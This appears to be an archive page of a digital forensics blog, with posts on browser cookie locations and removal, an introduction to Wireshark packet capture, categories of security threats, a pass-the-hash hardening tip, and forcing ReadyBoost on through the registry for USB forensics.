HTTP Cookies – Part 4 – Safari Cookies

Safari Location

Pretty sure this location has been the same for a number of years now, if not let me know in the comments:


Removing Safari Cookies

I am not a MAC expert, so I am going to bow out on this part and pass you over to a blog post I have found on the subject 🙂

Posted in Browser Forensics, Cookies, Safari | Tagged , , , , , | Leave a comment

HTTP Cookies – Part 3 – Chrome Cookies

Chrome Location

Windows 7 onwards:

%LocalAppData%\Google\Chrome\User Data\Default

Unlike Internet Explorer (and like Firefox) Chrome does not use individual text files, but instead uses a SQLite database. In order to view this you will need a SQLite browser (easy to get via Google).

Chrome Removal

As with Internet Explorer and Firefox Ctrl + Shift + Del will shortcut you to the delete history page to allow fast removal.

If your wife hasn’t just walked through the door, and you don’t know what Private Browsing is, follow these steps:

  • Click on the “Customize and control Google Chrome” menu in the top right of the browser
  • Choose “Settings” – or type “chrome://settings” in the URL bar
  • Scroll down to the “Privacy” section and click the “Clear browsing data…” button
  • Choose the appropriate tick boxes and time frame from the drop down
Posted in Browser Forensics, Chrome, Cookies | Tagged , , , , , , , , | Leave a comment

HTTP Cookies – Part 2 – Firefox

Firefox Location

Windows 7 and onwards

Unlike Internet Explorer (and like Chrome) Firefox does not use individual text files for storing cookies, instead it uses a SQLite database. In order to view this you will need a SQLite browser (many free ones via Google).

You will notice Firefox is the only browser (of the big 3) that stores the Cookies in the Roaming folder.

Firefox Removal

As with IE you can press Ctrl + Shift + Del to access a quick menu to remove browsing history.

I am tempted to rename this the “Oh shit the wife’s home” combination, either that or the “pre-private browsing” combination. Let me know which sounds better in the comments.

You can also remove the cookies via the following steps

  • Press the “Open Menu” icon in the top right of your browser
  • Go to “Options” – this will open the options tab
  • Go to “Privacy” on the left hand menu ribbon
  • You then have two options:
    • “clear your recent history” – press the down arrow to ensure you clear the correct artefacts
    • “remove individual cookies” – does exactly what it says on the tin.

The “remove individual cookies” option is a good way to view what cookies are installed without the need for a 3rd party SQLite browser.

Posted in Browser Forensics, Cookies, Firefox | Tagged , , , , , , , , | Leave a comment

HTTP Cookies – Part 1 – Internet Explorer and Microsoft Edge

Finding Internet Explorer/Edge Cookies (Windows 7-10… possibly Vista, but who uses Vista?!)

Microsoft introduced a cool new way of finding your cookies. From the Run prompt or any Explorer window type “shell:cookies” and you will be taken to the Cookies location. Like a Windows Hearthstone 🙂

Location of Cookies

Just in case you want to do it the old fashioned way…

Windows 10

Windows 8.1

Windows 8

Windows 7

As you can see there was a shift from Windows 8 to 8.1. the “Roaming” folder was designed around “Roaming Profiles”, these are used in some domain environments and allow users to have things like Desktop icons and favourites when they move to a new machine.

I would suspect one of the reasons for moving them to “Local” would be because of all of the tracking cookies and other nasties that can reside there. You are basically offering free lateral movement to an attacker if they managed to get some clever attack based around cookies.

Speaking of which….

“Low” Folders

The “Low” folder was introduced in Vista to allow for browsers to run and contain certain artefacts in a segregated place.

Removing Cookies

Like most HTTP cookies these can be removed easily via the browser.


  • Click on the ” . . . ” button in the top right of the screen.
  • Click on Settings – Or press Ctrl + Shift + Del to jump to this step
  • Under the heading “Clear browsing data” press the button “Choose what to clear”
  • Ensure “Cookies and saved website data” is selected
  • Press “Clear”

Internet Explorer

  • Press Alt to bring up the menu options and go to “Tools”. Or go to “Tools” from the tool bar.
  • Go to “Internet Options”
  • Under the “General” tab, under the “Browsing History” sub-section, click “Delete” to bring up the options page – Or press press Ctrl + Shift + Del to jump to this step
  • Select the appropriate tick boxes.

Windows 7’s Internet Explorer has a lot more inverted options. For example you can keep a box ticked to keep some cookies whilst ticking another box on the same page to remove other cookies. By default removal of the “Do Not Track” cookies is ticked.

Things got a lot simpler by Windows 10.

Posted in Browser Forensics, Cookies, Internet Explorer, Microsoft Edge | Tagged , , , , , , , , , , | Leave a comment

Removing Cookies

Do you know how many cookies are tracking you? Have you tried to clear the cookies only to find some things not quite gone? Well I have a product for you!… just kidding, it sounded like an advert, so I went with it.

This post was inspired by the Evercookie

Cookie Types

  • HTTP Cookies
    • Internet Explorer
    • Firefox
    • Chrome
    • Apple Safari
  • Flash
  • Android
  • Windows Phone
  • BlackBerry
  • Silverlight
  • CSS (typically on older browsers)
  • HTTP Strict Transport Security (HSTS)
  • Window.Name cache
  • IE User data storage
  • HTML5 Storage
  • Java

[Source and inspiration for this post: ]

Rather than make a really long single post, I have decided to split this up in to chunks (that helps me keep from going f-ing nuts too)

I will start with good old HTTP cookies 🙂


Posted in Browser Forensics, Cookies | Tagged , , , | Leave a comment

Wireshark – Introduction

What is Wireshark

According to

Wireshark® is a network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network.

What does this mean to you? This means Wireshark allows you to view network traffic. The way in which you capture the network traffic further refines this statement, but basically, you can look at network traffic.

What do you mean by capture traffic?

Well, there are two ways to view traffic, live or… well dead I suppose. Live captures can be useful for seeing what is going across your network, or what your machine is doing at that moment, but it’s not easy to analyse live traffic as your interrogation of the data will change at each step.

A recorded live stream is saved off into a .pcapng file, these were formally .pcap files and most people will refer to a saved network stream simply as a “pcap” (pe-cap).

Most analysis is done on a pcap file, whether this is a network forensics looking for illegal activity, a malware specialist looking at command and control traffic or a SOC analyst investigating and intrusion detection signature firing.

Where and how do you capture data?

There are a lot of possible answers to this, but I will give two simple answers.

  1. On your local machine, capturing your own network interface card
  2. On a network, aided by a network device, such as a switch with a span port, or specially designed network device known as a tap.

The network traffic is then stored into data files, typically a pcap (pcapng). It is possible to store the data in other formats, but that is outside the scope of this post.

The method of capturing data is not important at this stage. Just bear in mind that Wireshark is used to capture data on a local machine. There is the option of the GUI or command line interface (CLI) version. Previously this was called “tshark” however since version 2 this seems to be the same as typing “wireshark” into the CLI.

Why do you need to capture data?

When a company captures all network traffic entering, leaving and traversing their network, they are said to have “full packet capture”. By having this in place they enable their security analysts to prove if something happened.

Picture the scene:

You are eagerly sat reviewing Arcsight/Logrhythm/, an alert pops up from your Intrusion Detection System (IDS). The alert reads something along the lines of “Bash vulnerability attempt”. Immediately you think of Shellshock and try to remember if that got patched. You ask the IT guy who shrugs at you and mumbles something about patching causing more problems than it fixes. The trigger packet (typically a single packet) on the IDS shows the attack, with a wget calling out to a tools server pulling down a script.

You are at the Schrödinger’s stage of compromise. You are both totally owned and 100% safe all at the same time. Without full packet capture you are now destined to explain to the IT guy why he has to pull log files, patch his server (if it’s not already done) and generally do as you tell him. This requires a booking code, justification, and explaining to various levels of management that you don’t know if the system is compromised or not.

Now let’s assume you have full packet capture.

You get the same alert, you retrieve the packets from your full packet capture system (there are many ways to do this… lets say you have a specialist product for this) and begin to investigate. You see the initial packet…… you see the tell-tale parenthesis of the shellshock, followed by the call out for the script….. did it work? The server only responded with reset (RST) packets. The tools server has not been contacted at all.

You can now escalate this as a true positive (alert fired correctly) that was thwarted by the security tools (OK, it was thwarted by the fact the server wasn’t vulnerable, but hey). The IT guy can carry on eating his doughnuts and the managers can have ten meetings to decide that you are awesome. Well done.

Ok, slightly silly example, but you get the idea.

So why do I care?

As the scenario shows being able to manipulate packets, or network data, whichever term you prefer, can calm a potentially bad situation by having visibility. It takes away the requirement to guess. The program that you would use to investigate the pcaps in this scenario would be Wireshark. It is free, easy to learn and has the depth to challenge even the most experienced analyst.

By understanding the basics of the program, you will be able to find a wealth of information.

My next set of blog posts will take us through Wireshark basics and up to an intermediate level. The posts will be technical in nature and you will need to have a basic understanding of networks.

Until next time 🙂

Posted in Network Forensics, Shellshock, Wireshark | Tagged , , , , | Leave a comment

Types of Threat – Explained

From a high level what are the types or categories of threats faced by the Security professional?

Let’s go over some basics.

  • Internal Authorised
  • Internal Unauthorised
  • Internal to External
  • External to Internal
  • External to External (new)

The first 4 are quite well known, I have added the fifth (external to external) which I will go over soon.

Internal Authorised

Person with legitimate access which is used to carry out unauthorised activities.

Such as accessing, removing, modifying or deleting sensitive data. Adding unauthorised programs or files. Using Software/Services for unauthorised activities.

Examples of Internal Authorised:

  • Edward Snowden – Administrator who stole classified data and released it publicly.​
  • Chelsea (formally Bradley) Manning – US Army Intelligence Analyst who leaked data to Wikileaks.

Internal Unauthorised

Person without legitimate access who gains access to carry out unauthorised activities. ​

More often associated with opportunist activities, such as removing, modifying or deleting data from a system. Reconnaissance activities can also be a factor including hardware/software key-loggers.​

Examples of Internal Unauthorised:​

  • Enemy sympathisers working as support staff during military operations.​
  • Building employees such as cleaners or maintenance staff.​

Internal to External

Person with, or who has gained access to, internal devices, in order to act in a negative manner toward external systems.

This person may be working with political motives, exploiting an opportunity, or carrying out a carefully planned agenda. Regardless, the reputational damage to a company will be severe.

Examples of Internal to External:

  • Disgruntled employee looking to damage customer relations.​
  • ‘Hacktivist’ looking to make a statement.

External to Internal

Person who gains access to the internal devices from an external system.

Objectives may include deletion, removal or amendment of data, installation of software or manipulation of internal infrastructure through to defacement and public embarrassment for personal or political gain.

Examples of External to Internal:

  • The Sony breach. Sony were targeted by an external group of attackers who looked to embarrass and influence the company to act in accordance with their agenda. ​
  • Ashley Maddison breach. The site was targeted and customer details exposed with the attacker stating that the company was carrying out immoral business.

External to External

Person who accesses the internal systems from an external source to launch an external attack

These types of ‘pivots’ can either be to hide the attackers true origin or because the pivot point may be a weak link to a more secure target.

Examples of External to External:

  • The Target Breach. The retail company Target were breached in order to steal credit card data. The attackers used a HVAC supplier’s network to gain access to the Target internal systems.

Why do we care?

Understanding the types of threat that are present helps a business to focus their efforts on the those deemed high risk. For example, smaller companies with an intimate and small staff base in a single office may not need to worry about Internal Unauthorised as the know the face of each staff member and would notice instantly if a non-staff member was using a machine.

Similarly a network which does not connect to the internet would worry less about the External to Internal, and more concerned with the three Internal threats. The External to External may also become a factor for any trusted supplier who has a logical connection to that network and the internet.

What should we do?

Have three conversations; one with senior management and where they believe the threat to be, another with the technical team(s) and finally one with both technical and management to discuss the differences between them. Bear in mind that Internal Authorised may be in one of those two teams.

So what can we do about it?

As this is pitched at a high level, it is not the place to decide on specific technical actions, but instead to look at high level mitigations, for example a forensic readiness plan will help to recover from such actions. Having a forensic readiness plan in place also helps to reduce the accusations of complacency or negligence on the part of the company.

Build scenarios, consider what might happen under each heading. How could that potentially play out? Once you have basic scenarios in place look at how to audit those scenarios, or even how to prevent them. For example, are all internal routers patched? Are the passwords the same on every local admin account? Do you have centralised logging? Is that logging being monitored? Do you have agreements in place with 3rd party suppliers/cloud services on how to deal with the acquisition of evidence if there was a problem?

I know there are a lot of questions, however this post is more about awareness than answers. People like me can be employed to work with you to answer these questions, but they will be bespoke and not something easily found via Google.

Posted in Cyber, Forensic Readiness Plan, Incident Response, Preparation | Tagged , , , , , , | Leave a comment

Pass-the-hash Mitigation – Tip of the Day

I have been recently researching Pass the Hash mitigation techniques and I have found that there are the usual comments about not logging on to workstations with Admin accounts, ensuring your local admin accounts don’t have the same password, ensuring a sensitive machine isn’t being managed by a less secure, or less sensitive machine. But the one tip that jumped out as a quick win with (typically) no impact was the ‘debug programs’ setting on the machine policy.

As this is set to “Administrators” by default, which means the attacker needs to get admin rights on any machine (local admin, or via privilege escalation) to allow them to dump password hashes from memory. Disabling this for all users helps to prevent hash dumping tools from achieving their goal.

To find this in Group Policy navigate to:

Computer Configuration\Windows Settings\Security Settings\Local Policies\User Rights Assignment

If debugging is needed, consider creating a debugging group containing accounts without admin rights, allow the user to use the ‘run-as’ feature, and delete the user once the task has been completed.

If the user needs full time debugging rights, treat their machine as a hostile entity, set up some strong firewall and IDS rules (make sure they are logically located behind these devices first 🙂 ), ensure that credential caching is down to the lowest usable amount (this would depend on if it’s a laptop or workstation) and only ever administer that device with ‘burner-admins’ – these are temporary admin accounts that are used for a single task then deleted, this may sound like a pain, but the alternative is more painful.

Posted in Group Policy, Hardening, Incident Response, pass the hash, Pen Testing, Preparation, Research | Tagged , , , , , | Leave a comment

Force Enabling ReadyBoost Windows 7/8

Whilst writing a presentation on USB Forensics, I was hit with a problem with ReadyBoost being disabled on my Virtual Machine. The message would read

This device cannot be used for ReadyBoost. ReadyBoost is not enabled on this computer because the system disk is fast enough that ReadyBoost is unlikely to provide additional benefit.


Looking around on the internet most answers point to setting Superfetch service to automatic and starting it. This does not work for this error, ReadyBoost is working, but thinks it knows best!

After a lot of annoying pages I decided to take matters into my own hands! Within the SYSTEM hive (under CurrentControlSet) is the Services key and under there is “Rdyboost”, this contains all of the parameters that ReadyBoost uses to decide on if your USB Stick is up to the challenge.


Under the “Attachstate” subkey there will be a number of settings, on this VM there are 2x USB devices and 1x HDD, on my live system it is not so easy, there are several HDD all with ambiguous names (found the right one with trial and error). This value will be DWORD=2 to produce the above error, simply set it to DWORD=0 to allow ReadyBoost to come back to life.

The properties of the USB stick now show the following:


Although the USB stick is not fast enough to be used, it does prove that it is now working. The reason for setting this up was to populate the EMDMgmt key for forensic analysis.

Posted in ReadyBoost, USB Forensics, Windows Forensics, Windows Registry Forensics | Tagged , , , | 19 Comments

USB Roadmap v2

A quick update to the USB Roadmap, a few comments from the first version were regarding the arrows. They were a little overwhelming and annoying, so I thought I would re-arrange it a little.

I will look at any changes I can make to the map itself over this weekend, as I will be using it during for a presentation I am planning on the lightning track at BSides London. This would be the first time I have done a public presentation, so wish me luck 🙂


All of the data is identical on this one (except I added the word “enum” before USBSTOR to show it lives next door to “USB”)

Apologies for the lack of posts recently, I have started a new job which gives me less thinking time than my old one. This is a good thing, it means I am busier, sadly the blog has been neglected. I will do what I can to begin adding updates again soon!

Posted in USB Forensics | Tagged , | Leave a comment